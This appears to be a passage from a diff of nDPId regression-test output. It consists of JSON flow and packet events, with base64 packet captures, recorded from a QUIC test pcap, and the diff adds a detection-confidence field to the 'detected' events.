NIDV+IxZQ6OWB7DM0Z83epJzGFj5\/uYXKmk+BbONhvtUkbwsIoFVtH1Q4vZLc4nHVR23cDEhozshXDSC7PWSfxClKjneDPQdrDLr0vgsH8xBaaaTioZjwEVMdhbN8FsX\/rL6bMhM+b9iF41rToFIYIcSRksL0LulUfkhaEGqLUnpKwuyqlF5UpMMngzqdoYUpd0fzQgxA99TnPf\/ZibGXba4goUBq5aTeKljwjQvpfeDm0N71QVgSNFdU8sTF5RiM0jkfLo8VOjKRpirBNuYJ7DIAlvof3NA0Grn8dQ7f8YWlV1lHjXfjMeogHBB\/P2mTQzXX3ArnxmdG\/i2\/iEZexnqGBauYfcvUbCb4yWGyQ+uf4buf9Z9AyMQMsYl+B8ptpOp5x0NGkqHT26QYAV+A6a2HfCBCEg66zE4TRZrMqr6q6\/a\/IE2n6Yv2maemjmwg4iHbv195EUc9666Xw\/knVVZHK8GuAAgFkIfnCTuFvSaCEwbnOXJ3s++e1rXdNr+Hg0b2Zbi4Ef9DQNeQpBIh3Ur7TEj8IDc\/NOM35lp7oYr7QO2zj6YAWebmCqb56wXDDn5mBBgu37fQhnakjMV7jHPkryVTXnFiOaL\/CVFGTvS46bBvmJkLPq4HRzoYbmboqQx4mXB1LvgMfXrHU3l7iZLz\/2XPIqh+KYqtzkanEAs3nElKsp2sB5mExQqIIubK+l5dcRdQNfCBmPrColZiPglV6Hv5liYk8JJ8Kbi6iN9RFbJHoGR+dLu3tvqT\/dah4soYZhtI9JnUfTXwZhINQmrqt11PjUN5xy2FY4x7Hur7+46IjhG3mRUQfKZk31z3sThwR5xjbX16LSIZERlLjpMdpm+lcm2fcsmWRXoQTgM8\/ugnLqEQDMuUDGvRukyIwk88fRryMIRKV8KDVhw4+vJ2EZLvYDeRSBFQdsKzSa\/hTqJc1bTtpaEUuGT2u\/or12NqrqQU7wVWi3YOk1X+OSoNbRXciEI2LGKLRqsnbsAqS+IJRbeA+3y8sXStW3YAt1gPKq7Pgq5cW4+8O1NmIlJ6gz1+lq\/WisqZhapMN5rUgoylNO5YJPHuzHdkOWHinWJ52NWCXnOYekNmJLkh41YrSQvM7Zm1APRBCuH+h9RHttH1u+s9o2TQ4uAPAAFWi6bluDPG8hlbO7uz7OAKhhEJ239ij+NXPbweBE66DiURdi7Gj3kcjPg3OPsIP1L\/pUMzoKutj3ZBRiMec+XXaGz3s5ppe5ssD\/WW3cQpGois32lgVeJrDmpDxCsEoxF\/1Tdai7z0bd"}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1621494599466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621494599466,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVm9AAH4R6Xo0uxSv0OWdUcmjAbsFTojgyf8AAB0IjEZZ7Twbo9wAAEU001Nedh8jl0mRxcN7+5ymyAhdk9NMUwxYze3lIyYWk2jP0t92iE+L\/yAM4MnpE0YCo8Yj\/sG9IYL5\/Jqz+v0\/7PZJlA72+xIp\/Zz2FHFmfCsrXJBq8qMZr4yMJUaTQ79L\/KyQSvCHFBgMRJUhRKX69bPpnAnksqJirAlkiGBvT0YEt9mMoiR55EP1zkREk8I1QRdfacOBiC1xn5oSmyEOrHRGNMlEIFFRJLgWr0XXotnRIEGBlAPOKZPZzQapDug6\/9gRem0rTXsSVsMhbztxGw\/vtcuhxHhCL\/sRMBYP\/by5OhP3fCsCPd3sspB94dh0sVKqpEvWHKRXI5qkQ8i0KiE6NKXE1Nhqr1NvADQnhHZesnr3pbbwRzdVtIdnVbg+KpCF5NoQHX8ZH8QDyNjWRE1jnBpB6l3OJ1sSKdAgaiw8Ptd9k6AGoDKbmF4ICOpOWeyjIS5UuYgKNS4W1hKboP4A0l98z1AMF1cWHOyoMcwHulLBVCbBON1h3OyJxCb+qSsMMjsumD6d4H94KHLyQlTJDPLNq5+27EH4JgoPrQnrhU70QkhyDGeMEA08Y3NMvkMXs9ScL+i2jzv5BFhQo\/tMXR8AuhJIM9staI9B52\/FDML\/NHMdUhCiYzlzdj1bMiHMjmHtScQaruiH9wV2aP0flj8aUj5pRTOyuCcs7Yj8tosR5Q7Bc4J09A\/d7uBuSzN6SiWaOfxKRsQjRiB+PoBFp3RyZI15eo0FBDGFV9z7YaWXpK\/QUxQVAHHMQr6q2XYdo34fAYM5WCCSw55MSvIPkgf5o0DYE25dUpBH2wSkVcAbptZSsQKNwzN7dqVdVmsRhsSqNIVkr94Mgea0XDKOPfcuA0DHWVB2NpAqq\/2KIzHInDQ6qFc5M4nF4o54hvOuiL+GByVbEQt\/\/entGulu7X2JEiyqmYk92gVvJPNI8Bwemp05+Q+twxKscsRsU5w0Xn4LJ0aYLhTJviBC5fXR8Pc1viFBHXYXbarbLaQ3PMRows7y8XdeOl\/bsuCdG0ch6eIFsRvMMwjmhUgHj6ZC2WxikfNArVb9\/GqEMsVsVGaSerfdOb8LTsT5SWnrIpnMmWN2uIjFPgyu8\/qOno2piahKRLskEqrRUpNfLzBpNxlY9abVFtVrTQFSn+Bv0pyQSJS4S8yhl2CkBgItTkREH46KOs97E\/bHK\/yGj3NexQldO92K00H85joQ7nGUScRMKfqIpqXecJxSM6OAroxCymb3vSJmrnHwKgY0lo+ETPgqaXNxSMmLS\/2JsUVg9IcXwjmP\/hdzYDT4SjdN\/NCNzQLqEDcD8ycSm8xG+d2Pvjum+8NDSNcasGk4ZrSjQeckzYfCVt3NCKRhy2IHBlWjMTzzyU6DPzhIcLNpxSDWwl1i2IaHmb1isu27465MaWunzERUUlOR+kzIqaRHPTGq7D8F9Wz\/Lo9VOIM5KywiZogg8pDlQ7rw5vQ2wQF5TAz7WtDmtXKPT6M2TZLh0RCInRTlcWnKpFX\/38oEnnKrzaye2ifSAUvdyfSNZNXjY2UYGYg6Xrow72NLPTC9O\/+G9i89rbi0HpJcLFfEQxFMQ1sztsPWaTAohU5yyk90ga7gEn9IGLftr8nTGe13R6POb\/td5pOruFoWbUnJjSDEOgXIJWatBnyyLDn9kNeLMGnrjo17scXrhmlTzgSFpT8tsc+6WK+4OwCSK7uN2VYU5zw7G2oqvb\/XH2izKQLOvApMhxYFBkNigiUw+ruYaH6KQmSISbShAPpmf6e3Ok4EN\/1H"}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1621494600068,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621494600068,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVq1AAH4R6Tw0uxSv0OWdUcmjAbsFTrvcyP8AAB0IjEZZ7Twbo9wAAEU0356vdnE85kFrnK9PnoN7N\/6cuhgJZOurPVLrUkSIEhjazS+SHD5nphYh\/Ei9oaiDY8Opbyw\/qBtRNMamhXjzOXvgznSeUsgwy1Y\/wE6Z8L\/PLMFoRidzgyIEn6rjIJKHwzzF2KGrVstlhyz2RTwgIvHMy9MIjilbgudOkuRl5cUCx4DqELWc9uRZ3o5vsRYtLfQcGLcZxuZNq+qR4l\/haEcF\/bo9RHUYHevsrmU3WGlZq2VVs06I2zfKkHonNVQotk1bro8ws9jUj7jyxUbwzWCdp3Y0J2vApeu9ELE8rutr0ZnW7RegpTFdI+\/pjDsy7w+XtT1RZkjL7KyYUDlQxQdEaIMNGHrAqXcCdWe\/PGc8CDZEYRQG4imIq3PmqUKfLT1H1z5PjAZqsks7C4eHUMCY+G0m1pwUNctiLiFN\/1UbsvMid1sQh6WBXSJiOYMPhFaj32vm6bQzmsW166O9cP+ju7nY2kDwHjX1VRLKHDBPT+BqIPgfQsjJdmUiCoPO1j6aSYQVgo0uGE74BSKhT3W7x1ONh6fXLzmN7+wWyuCCjfUqF68k4DNAO5ugG5nw7CpIh4otPJ3HMgytjz\/1hKjAQhcC4anVdWe0zLhoQLK+s1Pp+iUPac8alWHNwAjuYOUrtvLlDW5GtHXWtZeiHtJznZvOZ++hzVm33rcGcrUAJZx8UDtbZOWODHW2DvBPFPoCX6ZQVBXs9voksBXC+G9JF7eqoFmqO\/EH6soGSg6sF0snwdl4Tmbozt2\/yp4ye5MHCKh12GvgAGa\/SRfEXeWrk94V+VCNFH+5X7\/8EcicVy7uChM5zWex3QUxbJVdLP\/j5AI3XbgkHGGZyofmIhkZxWEV98Sv0kfttNMcxA841+aSpRVJN0a2XfeGieapwvw\/R6yETR9CN8TcQTFe6UQYPq7543m22E4Sg8mtjsfi7GhTVtBFlPk02hhEbcLmI3PLT100l2b\/h+mQABi\/RqHWxECe91tiAPUoarX+VKj0c3DqByummicCRPZ6kkW6whbXho2HsoAk+D7QoyjIYr\/kbmXT3ddi5XSAc3T\/AXjnmkbnhNKsXrqcM9kMdl18Kd80bmVHFpHplnIJlyzn8ksEEhjYfE\/gaufdnXnq1D3ABRKg2gQzIvoSpfYLvtOATq8ZeC375hfqRNXtw\/n1kUK3bICXzA6mFxkmQD7AGOSqcR3jSdloiLRo+G\/p15yY7zRCuvYbEtKyY7omcrKB9AP+U0Y\/znYg58r4wOaZBC4V+dmRK\/kkpba47uaqRhUyF\/yTdt5a8rnd6rmCkS\/vkMPoDjgVn9aKrD3m9zX1zDlvbDZWh6g6iUswysusJDPEcMqVt9oBikmJmTA4XJHL7KebwbAwBNS3e6+CgYETncO9oV627jebHXfk1gOzNt336lADXC3SIjRhE0xUCj9b7vGl2zV\/XiVaHp4BdieNUYdFnptfsJwounQcX5RSNrDM7WkoXytf9j\/GcyxSIH55p+0ANjoTPQ14vhNgMa5CNLbJsAFOaOAZLOmrRttaEW+CIy\/6QEDgSPdDqCmjHaTsDMAS0PJ+CViTPaRKX9Mb\/HoG1+hLb7WLn885xXvuCUz6bu45JBXtjOSd2sFZtZL5SSAAkPqTlNn4yof7j6smtUT03YKs+rhKLROxwhgN\/v7YhG5RqBATOJnmQaGvuGYn8hIWfZ0uuo2mUCeo5E23kwQk4p+DKVCBDeHuSFjGPVCnKBGHNbnoLJC5+6z0UTOz+H8VNr5FqbVxdiFV1rCMp6QITKc\/"}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621494599158,"flow_last_seen":1621494601272,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1621495208068,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495208068,"pkt":"AAAAAAAAAAEA4PSECABFAAViwetAAH4RV8iokEAFXWSX3eVPAbsFTgNDy\/8AAB0IwxBIsrHTx3QAAEU0bjduGiBH9YcAvIt1wprzZRiYJMPzF1MMPECwlUSWc\/RBbV+iPDb\/v0+UPTqOqIz1XEDYAo7pbau308le6Th0FZqRlv4SU+qXh+iRpNvtIutuNBwNhb6WnLZjvRY70vVsUgD0scdNaDgMj3pPrZ0V8bA\/xmESw7VNToLPcOadkH9MHbF41jMAPEaD3xqUkat1\/m5M4Pv0eZtU0YzflDUjEcIUViabEpyfwesJgnqwj9BXqmfBSQXLW6uS7UCVUFH+dCmqa\/iJJ4SrwnAYJlCIN9NwJ+1Ze32XUdoN4V9vQ5GScujeLsdwY+HlSYWOZd9d2+\/d597gVGXqOsrTKKKVZCRdEs9QySjbJmNdJ4wcHvezwRkLYorieHie4sHilr6O5PVEqCfP8aHxH6msP3pHsklsYop606JbaZfCUfDG3w9nrXiNdmjL4dJ0aBKky9\/MhuPCuq4g15oIigu1FWbGfnmKl3BVJ5ryEDgMgOYehMyIJ+weIqtrAsvJaI2654d2yQ2OH9clUvxOeU\/jKLdsEL55j4Tpx9kOP9X\/3VWUCYt8YZ5rPGJN919ko9rZSBS1iM\/mjZCh7R6C1BomS2uqQqN\/2PwrKORuR7kRPmRkEsFpLoC4sATPr\/GTOP4nq63u7VF4sRJLtFi0qkGLBgbQiSIJZtFdtEjfxSrL6lqAnUrfYHAOISDQ1zIN1STDOnYrZ+Szd6N0NTZjKTFuAILRTK6wWG7zCeHuTNeZX8\/oHFYs7C7zyiGROiQkB8jkJD03SKBESsIOyuKO34yRQ7G+tB9M+WUrPUQDrOaQYjktHLjExIf+tn3Q0v0e\/rX\/xZZ3jNOD8Qo4cgJe9IBtNjEwXGPmZe0mVY\/ufgxNE1QutAq0xthgcM+KYUEAzsSQrzZK7ZOiLzHOqVPgXabqgy2oQWta7AlIrCSdCUHqqZ2Br7i1\/EFecVKIWlJ6vPFrZrOW1amQ6rV5WG6x9ovznlQWmBXygRZ6Zl6H11NDYyBm3Xb8pfynprut37QWSPCciwK7rtbnKe+EUnnE3Lnwb5XQzYSEfhojjMsjXsuZk2\/ovtBV2Jkl90MUUjDk4XeHIhe5n2t7qmj8rxsQKuxj9rBjDRjH+OIEZKEgLrFx5GoAGcYxzb3iHJF3TqdzTXu+qBokr4C959Ki309NAHaXzDaotCBtbPJMmwo9pqOst5Z\/tUfAwxDkswPSvCJzhA9mKCrSpl9Hf7PMyNrHdZTvaZMSASEy5\/sXqR7D3JPQ0B6dM9WwJIOoJ9KhPZ04lCOFJrW856gP8dZwzXWKZ5I\/qcrmankwbLnu1BKyarOpUL01fzxuRuamfUYfUru2TsLlGCUKIoWaMMrIKq4yKC6\/6T\/HJSYLPqY6fqVNsFh7bYwtGviFJVCGEYBPrNIOz4yL3nUg1+uS6Kxs3zX4N67DQOOGoQbq6bHyTlfJI4n01aPlGre0bfmC6Tp3JWM98e2jHYR5XNuWQjoxn\/Z1NA+ZLc3yPpyEnSO4zqV8lVzpFrDpqkbQ9ycyuV\/D1kx\/32e3Zc0t0r1GFlvu5HnAklFEwANPKBU7ocnXr4EBpq1xKM1aTAWc1RcVfilSm1xz82LQyCCJOc5iO\/zmin3ZpftGXkTCNVvQW1LtwAAhh0Zlx03rw7AC\/J1p0cID8UBIj7r9QeymlFafS9\/16+RcZYgdL3KUrKdHSbSrCPKTng4X0j\/abdtQxrxTSZYjKGQPl+WBVoLmCgqLLkuJIJhEXfQiPfgtO1fDtgu+l2TZCwO8OKgySKJH5cW\/"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1621495210744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495210744,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFXpAAH4RYIKokEAFgPgYAdcaAbsFTt\/iyv8AAB0I2zeQoOz5WyUAAEU0jhtk7ZYO\/t++QG80XD8xnpwXGKbf+FVJ+ISOgwLVL45kqQP6tSuWth5HXdoJc8ZyI19g5++SRrnWaPSJCxPjE9g315E4TbKU9m\/we74ovYlIndf6LYLJ0WqrP6o8IkyXDszg8SzZSMt4M30t4SgDRR6Q5o2IbPGolAh7UamAr90QEylR\/uIS0sasMvvkSpysRp9ckggnCAbstJcHBvinhjkG2VSPzmjNJoDsOtvPqHPtJvNpojktPxYWHTjpWdYUAod79DMkXY1vRqntsgNNDYXeZhdoXwH2HWV\/exDKz+F9bcgQNX6hnXanzIbxcQxbT7yuzcXLZMUP0rJvP9NrvYnLotM2YIP1NkqQ4MUgi\/LE+5\/YOOGegvWSeBErSprROif2Slau6EpF9Rq4x9QyI9geY7GPFow13L3eizcByac8aehgQKHihAWI+Aqo4T9GXf2lmgEXe5yhso68TiNdxt41vH2DonLNC7Tc9M7Yorh3IwY5xUSGl\/cKy8\/pNoo+tpLVj71oehQFnGVEF+ybMdivZd+7KU8tyx6ITEtXyiw3M6HXXtpk3dR6MsHhhasZ7jAjpsXi+vLpD6vyr7XXniVlK3Lr9tM5wlg\/jvTaI4NkA218LBhKKGxwAGv8oCPrc25uEEjEejA5BPJgFu\/CiYBkhUaI\/kKl+nzfCcirOfwodGDc0COV09EassJlEJui5t3XnNV6EBm1lbnXwDWWeI0ApwOcHPJltBOadayMvcNnaSTKZUXlUZMHRVbucS36AeTVGz2gPUzmorPO2uaLQlFHbWbB1zjXeyc\/sJ9mtAMr9ZhShgV0cowmNG2pc9FJh6Zn2x0Xdbc0IwQyY\/6a4THfFzmMy8Jtca5vfwAC0913Z93ITxHg81JUp2VflW10aNBAK\/3ZclhXoSqIkiv185lAI98fihhaKIrmzK7Fy6nPKOaw7vIegqSSG6ZapEOg4SzV+xRYAgVte+oL1b6sJHDlbzRsP5zepWbsm85VJ63ZrUR3u8MAlt62wM0wL9097D97l3SQ+cYuK9W7nyjYx\/9BD+SJW0v+X4XA4vtGpyhFY1DOIH63kMLcMhe5aDv7B4XYQtlwZaWWnHrImv3mrYyGAL+lEluvRLRX9rEY5R\/mNiI2y6wWHzjt9pDJSkSYvJlR0qHzUue0vQ47hV0cK3JJqNngTXscTgX9aYnkYr8r4MNj9MakUpjEbwITu2IBh382EjALjSzLNo2XcWehzOYL27v3D7d7PDtp0rnG4OUFoW+IyHj1keIWK86WJtFdeBDMshTrkFdQohEGsthgjzPLWNJmhJL8ga45Ja1nwcOo2JogHVMcm8q8wtFTZXshq8+LkDrjmtHkC+WoUNWaOeSKZ7j\/oemgVwqEl2l7mvAzOxEJr1J3TfhfKU1NpXw7rDWKDBvJTfPruGKdPzB3Gxe\/my6eLPCswoooJpfxjAeoA1wH29XDgAt3X+b1xk+iODC\/DDY95uzF1zP+yDMe\/+Jl96QUOQQu+OtftKDxI85nxzLNHxoZjwWaFyJc1wCIfTz7dFAlvTf4s7vP5d2w81Q2oT0WBCvyq7u\/FZL7sO3QU\/WJNEl\/cHjLi9alY6m3pmUEjfwLy\/F1tNlRzfnY4\/lLHjdHuE173k72dusgFghWwAhzZ6MyVF4vHBG7y6pAA0Aeb2SJB\/LM7yndloeF5OJdKc8z0xx74TFrQsJXZitMjB7tfvygzYT0lT0+ydw\/XW3s+g3kR+JzDjS\/1mehf\/csJdmyGhkB5thAT1Mu4dteApqj"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1621495211515,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495211515,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGaxAAH4RgN6okEAFQSEzSvG+AbsFTsazy\/8AAB0Igb5NFJ6PF1oAAEU0xCAwnLtbjGUk+fejVmQozQOg0\/ESmN2FG+LOLPBns4theX05eIqUs4AHp7MrmdBMpaQWbc++dLtAQvCTs26HRJJN3DNALzirEZEWeKXTpfa8Ts+3tIY1yxvgw0lrCnC6WI4RVm+nJiWVtstu+BEaotx33QRtR1Kn9gDj9C+jgzsJvfbt+\/T4njpF9igVWsDeg57RA8NGboKJBBGDNLF0BQAAStKBXmKkpSZb\/Ai8RWN1Wct3KRq4r+qQ3P3+\/sCREOyEForD1qoAlfL9ibjQ5mOCpDDMysyN6vJIZBLAIDyvg4ilAKvWZ4QDSMJ9OgKY0ajtVjTL3fziHI53PUsTfoKz2LhwyKEfX8BmjBWA0jXT+sxB1lLAO4+3hy6jMxtGkeNNuhNuHvXbZMw7KZQweD2KxBTPSRJj9h4XOpS9jecr39\/eI6Ufn0VUWTti96mlVggW1ELQ9Gzv0mt6Sj\/iXWWlhaBrl\/5KcWrRXkoydLMLw9Vzz87jbLyNeVZLuWpfVSUh7CI0Rg1OwuBa6nYtOTUcERnuMjACBglx\/HzzMAhlNNo1t5mNQXmjiSnKPJhZCnk3p2LZGXu87vxRMlxSffV4SqrXO7wDQkUSYxXb7oZWdtThtgLUTVT2enl18CO7EnZE\/hMsDrKUng1wrmlJiEAKhVx84skul7zziN\/swLfTsLc4L\/Rh56+ksEb5ZOBD9pay5QOHbuHrJRo8m4CZVNnj3Dgx3xr+3JuKUvg+kOM3m7RI3Po4kt\/n8LAUml+mMQfl4NvAr6ubkDP1xqfcw0TJPkD7yMj6pyeGUDLzkvCt1A0lzBCbBAB7LgMBDnqF3+TKn8wjqWaCXD9\/MfwpZrUigX6+BgfBJhekq66OqMCnJ+VHQc6YXwl4WRujuUw5VdXOpzTw0OxPy9jF30qmvc6CFrRXOsheI7s1ZpaGAgRg4XoM2GPa0j8SFSUdAeiDxEG8GLGwk9cj7WlLuHBSvlmgsNsYJ\/GryTsJnP+UFmNZdhzB35TcvHB92LSpb98htP1t+0qfXuWWt\/XxIGWQ05O2i+qMOSQAGice3HQtfoGUecR1tnZtD3M+AG82g+yrfUCtloJRNeKF4i+NLICfC15RBLdQmyBHI4Jp0PrgoY29jnIk\/NXK\/K69zMHG9dwfAuGYGjV5+7S3O8LN0VKHpZX2MPzHvBSVAEeLIIrFvxPd5WAk\/NlP+VCgZeDw2WLWwSoBMKn3Hb45mqCzrz\/ewbbbIqKa5xT0fE07dK1+T6w4nEhZjWHuJ+RgLpytAUeLaUhAF16fa9AfEFIgjKGqBWJ9N5FXIQ5vG3\/jF6jSbeNlArJDPsDpC\/S4qXX3v6NM9AxXeUI+b6sLh2qGEkgH5rpD+sQDjPQTrbQ9qeHP9ScuuqxyVEFwBWkAsuBI47Z78qebLTD5Go0mPgMzirhwrkhtfLutVWtNkaHwAf+JYotY4qEhDzPGiadbe1HrDoGvbocggh3pxX51uqeJMe9WOH1FUYy5Gu\/xsfRfOCfcg2F\/V51slWJp5X\/9o4XM6Bw0YcrHBxfj9HNFN648ftB8pJP71vfUXO0grtae2iZgpV2t8zUeIX9GgkZlNUlWEMf9\/3BjG091t76vGyBugi9d89TV0NhohcgwJ+qcoqlNXcuHjhk\/fOqUS3wjE+1eYp5M6IexXwbRv3Nz+DIlCZvJzr4JVfLqNZ7hMWmHMe1dmGGZmJYxst5jAT7KaRnygYqCur4qVoS5QZ1HM+7v4L06XXJCVSvXpuEzfgoozex+hKNh2ucO"}
